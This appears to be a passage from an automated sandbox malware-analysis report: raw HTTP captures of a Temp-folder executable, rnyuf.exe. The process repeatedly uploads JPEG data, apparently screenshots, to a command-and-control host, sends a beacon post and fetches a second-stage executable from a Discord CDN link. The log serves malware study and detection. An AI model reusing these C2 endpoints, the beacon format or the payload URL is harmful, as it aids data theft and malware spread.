                                                                                                                                                                                Nov 11, 2021 12:27:05.966737986 CET22334OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:05.966907024 CET22337OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:05.992223024 CET22343OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:05.992286921 CET22345OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:27:05.992306948 CET22351OUTData Raw: 9e 59 4c ed ea ae 73 f3 0a e6 5a f2 ed ad ae ed bc d5 58 2e e5 59 a7 8d 63 55 0c eb bb 69 18 1f 28 1b db 81 81 cf d2 a6 7d 5b 52 92 7b a9 5a e5 4b 5d 5b 0b 59 57 ca 4d 86 21 b7 6a 85 c6 06 36 ae 30 01 04 64 73 4f d9 d4 e9 e5 ff 00 07 ef 77 f9 0b
                                                                                                                                                                                Data Ascii: YLsZX.YcUi(}[R{ZK][YWM!j60dsOwCvW^xum>#{Nnte!O-^2L1L&}FXA%#4nR#$1RN?-u/)Lrm_G60~ZKIX(,D^>GtrUiWz}:]e.
                                                                                                                                                                                Nov 11, 2021 12:27:05.992321014 CET22356OUTData Raw: 16 32 74 14 e8 37 68 cf 47 ea b6 22 26 ba 7f 06 4b 21 96 fe 02 4f 92 60 de 47 60 c0 8c 7f 33 54 0e 8f a7 cb fb db 7f 10 69 fe 47 5f df 39 47 03 fd da e8 34 3f b0 c3 63 24 7a 73 bc d1 b3 62 5b 96 5d be 69 1d 94 7f 74 7f 3a f6 33 bc d3 0b 1c 0c d5
                                                                                                                                                                                Data Ascii: 2t7hG"&K!O`G`3TiG_9G4?c$zsb[]it:3uk]FR4k-c+s{|]5\D1r^)b~gJ]JZ+_hJ--e1]j6w]f7W:Dq0w\+
                                                                                                                                                                                Nov 11, 2021 12:27:05.992394924 CET22360OUTData Raw: 9f f0 45 be f0 e6 ad a6 d8 bd e5 dd b2 c7 0c 6e 91 c8 44 f1 b3 46 ec 09 0a ea 18 b2 b6 01 e0 80 47 7a ca 15 d1 6a 3a ce 9d a9 78 73 5e 96 2b 3f b0 ea 17 ba 85 ad c4 c8 f7 7e 67 9a d8 97 79 8d 76 82 a8 09 ce 3e 62 37 75 e9 5c ed 6d 46 a4 e7 75 35
                                                                                                                                                                                Data Ascii: EnDFGzj:xs^+?~gyv>b7u\mFu5k2pl@)(AGz)hRR(*QGz`-- )i)Z(N!E-7(!F)D>SE(5DSsFix4iDipDRR8SuR%PxZd4H<
                                                                                                                                                                                Nov 11, 2021 12:27:05.992464066 CET22363OUTData Raw: 35 96 54 92 53 7e 67 a5 99 dd d4 82 7d 8f 4f 8b 8f 87 76 7f 85 72 d2 e4 93 5d 52 a9 3f 0f ac 47 ae 2b 99 96 22 7d 73 46 0d ab cf d5 9c d9 ac 1b e5 b7 64 54 a2 9e 51 85 37 04 76 af 45 34 cf 05 c5 ad c4 a2 8a 29 88 5a 29 29 40 a0 07 a8 1d a9 e3 ef
                                                                                                                                                                                Data Ascii: 5TS~g}Ovr]R?G+"}sFdTQ7vE4)Z))@QIUp}6mOzRs<T3(1RhfJQc#ho SSGZp5r%Y9nSI{8=/frhwDj=jQ+kQygSaTe{
                                                                                                                                                                                Nov 11, 2021 12:27:06.017832041 CET22373OUTData Raw: 6f f1 d7 51 b5 b5 86 dd 34 4b 42 b1 22 a2 96 95 b2 40 18 e6 a4 ff 00 85 f9 aa 7f d0 12 cb fe fe bd 70 53 8d 7a 7f 0f 5f 4f c8 ed a8 e8 54 b7 37 4f 5f cc f4 c5 f0 64 97 93 a4 9a ee b3 75 a9 a4 67 2b 01 5f 2a 3c fb a8 27 3f a5 6e 6a ea b1 f8 7e fd
                                                                                                                                                                                Data Ascii: oQ4KB"@pSz_OT7O_dug+_*<'?nj~BH@a_@K/=NkgMFdlF?:*FO__m:0R$LQ(L@GzQLRQEffiE;R%JM%&4-/zJQ@04RQ@@Qi(=i6
                                                                                                                                                                                Nov 11, 2021 12:27:06.071266890 CET22422INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:06 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                34192.168.2.549843178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:07.132184982 CET22422OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----c925e254e4791fa2143a0a21a6db1b88
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 94146
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:07.132301092 CET22422OUTData Raw: 2d 2d 2d 2d 2d 2d 63 39 32 35 65 32 35 34 65 34 37 39 31 66 61 32 31 34 33 61 30 61 32 31 61 36 64 62 31 62 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------c925e254e4791fa2143a0a21a6db1b88Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:07.132523060 CET22433OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:07.132584095 CET22435OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:07.157845974 CET22441OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:07.157927990 CET22446OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:27:07.157949924 CET22452OUTData Raw: 3b ce cf 6a 39 22 c3 9e 45 2d 8c 3b 1a 6e d3 e9 57 fc c5 3d 45 2f ee cf f0 d1 ec fc c3 da 3e c6 7f 39 a5 19 c5 68 79 51 1a 0d b4 47 bd 2f 64 c3 da a3 3e 96 ae 7d 8c 76 6a 4f b1 b7 63 47 b2 90 fd a4 4a 94 55 83 69 20 ed 4d 36 f2 0e c6 97 23 1a 9c
                                                                                                                                                                                Data Ascii: ;j9"E-;nW=E/>9hyQG/d>}vjOcGJUi M6#{T6iHJ1N(PS6(\1ERS!(PK@H)iF9-1F)iiJ4THZb)qKKLTM1NVa\n(?b1K~p^iXv(
                                                                                                                                                                                Nov 11, 2021 12:27:07.158071041 CET22456OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:27:07.158097029 CET22461OUTData Raw: 9e d5 46 63 04 92 5d bb 69 fa 9c e9 7d 10 4b bf 3e fd 5a 66 2a c1 95 95 c4 40 0c 63 1c ab 70 48 e2 ab df 25 dd ef f6 ac 8f 6a 15 b5 28 16 df 62 37 10 2a bc 6c b8 ce 73 81 18 5f c7 35 ce a5 8f d6 d7 fe 9e c7 47 2e 5d 75 7b 6f af ea ff 00 ae a7 43
                                                                                                                                                                                Data Ascii: Fc]i}K>Zf*@cpH%j(b7*ls_5G.]u{oCvicVvenb+]G8H*<H2I,$+xnGH=i;S'qzWqB}$(QFk)&\YAwSP+K4&GNVu~|x<RzxE=@RYTc$
                                                                                                                                                                                Nov 11, 2021 12:27:07.183336973 CET22464OUTData Raw: 6f f1 d7 51 b5 b5 86 dd 34 4b 42 b1 22 a2 96 95 b2 40 18 e6 a4 ff 00 85 f9 aa 7f d0 12 cb fe fe bd 70 53 8d 7a 7f 0f 5f 4f c8 ed a8 e8 54 b7 37 4f 5f cc f4 c5 f0 64 97 93 a4 9a ee b3 75 a9 a4 67 2b 01 5f 2a 3c fb a8 27 3f a5 6e 6a ea b1 f8 7e fd
                                                                                                                                                                                Data Ascii: oQ4KB"@pSz_OT7O_dug+_*<'?nj~BH@a_@K/=NkgMFdlF?:*FO__m:0R$LQ(L@GzQLRQEffiE;R%JM%&4-/zJQ@04RQ@@Qi(=i6
                                                                                                                                                                                Nov 11, 2021 12:27:07.183383942 CET22466OUTData Raw: 44 7b 3e a9 c6 85 a4 ff 00 d7 11 fc ab 17 bd 6d ea dc 68 da 50 ff 00 a6 23 f9 0a c3 ae 5c 2f f0 fe f2 b1 ff 00 c6 fb 85 c5 2e 0d 26 69 73 5d 27 18 53 c5 32 94 1a 91 a2 4a 5a 68 34 bd e9 16 85 14 e1 4d cd 38 52 29 0e ed 4a 29 07 6a 78 a8 2d 0a 3a
                                                                                                                                                                                Data Ascii: D{>mhP#\/.&is]'S2JZh4M8R)J)jx-:fZx&xRD=i$iL4TsPPu68k~(m+^yW.>]_-kC3Z8yVL:SIy}dT{w.f>M()T[;xt+f{$
                                                                                                                                                                                Nov 11, 2021 12:27:07.283346891 CET22519INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:07 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                35192.168.2.549844178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:07.680504084 CET22520OUTPOST /k8FppT/index.php HTTP/1.1
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 31
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Data Raw: 64 31 3d 31 30 30 30 30 39 36 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39
                                                                                                                                                                                Data Ascii: d1=1000096001&unit=152138533219
                                                                                                                                                                                Nov 11, 2021 12:27:07.710674047 CET22521INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:07 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                36192.168.2.549845162.159.135.23380C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:07.734736919 CET22521OUTGET /attachments/878034206570209333/908097655173947432/slhost.exe HTTP/1.1
                                                                                                                                                                                Host: cdn.discordapp.com
                                                                                                                                                                                Nov 11, 2021 12:27:07.756337881 CET22522INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:07 GMT
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                Expires: Thu, 11 Nov 2021 12:27:07 GMT
                                                                                                                                                                                Location: https://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mQia6h2J620Piu0yKhNW%2BgYoMURsEUJrcsITBBhRf7o3JwRRxO9bhyKUuk2ZJnTUtfgEYhwqXHdfbBkH5YHZtS%2BnASNTS529laGQr4qG6WU1XfuQIkUn4ZBm30xzP7JTtLLgwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 6ac72b695cc24a5c-FRA
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                37192.168.2.549847178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:09.279993057 CET22527OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----5eddff19410e7d4429415c2aadeac7e1
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 105439
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:09.280085087 CET22527OUTData Raw: 2d 2d 2d 2d 2d 2d 35 65 64 64 66 66 31 39 34 31 30 65 37 64 34 34 32 39 34 31 35 63 32 61 61 64 65 61 63 37 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------5eddff19410e7d4429415c2aadeac7e1Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:09.280251026 CET22537OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:09.280359030 CET22540OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:09.305268049 CET22545OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:09.305324078 CET22551OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:27:09.305352926 CET22556OUTData Raw: 3b ce cf 6a 39 22 c3 9e 45 2d 8c 3b 1a 6e d3 e9 57 fc c5 3d 45 2f ee cf f0 d1 ec fc c3 da 3e c6 7f 39 a5 19 c5 68 79 51 1a 0d b4 47 bd 2f 64 c3 da a3 3e 96 ae 7d 8c 76 6a 4f b1 b7 63 47 b2 90 fd a4 4a 94 55 83 69 20 ed 4d 36 f2 0e c6 97 23 1a 9c
                                                                                                                                                                                Data Ascii: ;j9"E-;nW=E/>9hyQG/d>}vjOcGJUi M6#{T6iHJ1N(PS6(\1ERS!(PK@H)iF9-1F)iiJ4THZb)qKKLTM1NVa\n(?b1K~p^iXv(
                                                                                                                                                                                Nov 11, 2021 12:27:09.305418968 CET22565OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN,p6ftUrZ$NQKjDN$<Jj4VqE9j4EQa[Yj3t.A$R"j)ajXINZ~O,P
                                                                                                                                                                                Nov 11, 2021 12:27:09.330506086 CET22569OUTData Raw: af 51 26 dd 91 81 a1 45 65 c9 ac a7 f6 c4 36 10 22 4a be 41 b9 b8 9b cc c2 c1 1f 44 3d 39 2c 73 81 91 c2 b1 ed 53 5a 6b 7a 4e a1 0c d3 59 6a 76 57 31 40 33 2b c3 70 ae b1 8e bf 31 07 8e 87 af a5 37 09 25 7b 0b 99 5e c5 ea 2a 23 73 00 68 54 cf 1e
                                                                                                                                                                                Data Ascii: Q&Ee6"JAD=9,sSZkzNYjvW1@3+p17%{^*#shT2qx^X<';+kT1p1h<*]Y5i598,3$D&]Y{T8S$AI<Yg]Oqny2J
                                                                                                                                                                                Nov 11, 2021 12:27:09.330549955 CET22571OUTData Raw: f4 18 bd 6a c7 d1 1e c4 0e 3c 13 a5 ff 00 ba 2b 27 35 a8 e7 1e 0c d2 47 fb 03 f9 56 4e 6b 8f 0c b4 97 ab 35 c6 3f 7d 7a 21 73 4b 9a 6e 69 2b a4 e3 b8 fd d8 a7 07 a8 c5 2d 2b 02 64 a1 8f ad 3c 39 f5 a8 41 a7 03 52 d1 a2 93 26 57 39 a9 04 86 a0 14
                                                                                                                                                                                Data Ascii: j<+'5GVNk5?}z!sKni+-+d<9AR&W94`JGzndS8jHMBe3VTu EdO(5]O?~54Zcn5D^/X/N|=\IlU d7BMJR4^)tVL:L
                                                                                                                                                                                Nov 11, 2021 12:27:09.330564976 CET22576OUTData Raw: f0 95 cd d6 8b 0e 88 35 28 1b 4d 8e dd 21 22 e6 cf cd 98 15 c8 de 8f bc 05 6c 63 04 a9 c1 19 ad 9d 5b 4b 4d 5b 42 ba d2 de 67 45 9e 13 17 9b d5 86 47 0d ef eb 49 ba 69 c5 ae fa ef fd 7c 86 b9 9e e6 03 dd 6a eb e2 d8 0a 69 b6 d2 5f 3e 98 77 a7 da
                                                                                                                                                                                Data Ascii: 5(M!"lc[KM[BgEGIi|ji_>w7r=5%kxr}5Y.Us1&DVY?B9sywa5?>b8>Jm>A{cw\w~8OY^$qR,N*0#=#`+7-6W
                                                                                                                                                                                Nov 11, 2021 12:27:09.385596991 CET22636INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:09 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                38192.168.2.549850178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:11.856651068 CET26346OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----5eddff19410e7d4429415c2aadeac7e1
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 105439
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:11.856761932 CET26346OUTData Raw: 2d 2d 2d 2d 2d 2d 35 65 64 64 66 66 31 39 34 31 30 65 37 64 34 34 32 39 34 31 35 63 32 61 61 64 65 61 63 37 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------5eddff19410e7d4429415c2aadeac7e1Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:11.856884003 CET26357OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:11.856970072 CET26359OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:11.883800983 CET26365OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:11.883851051 CET26370OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
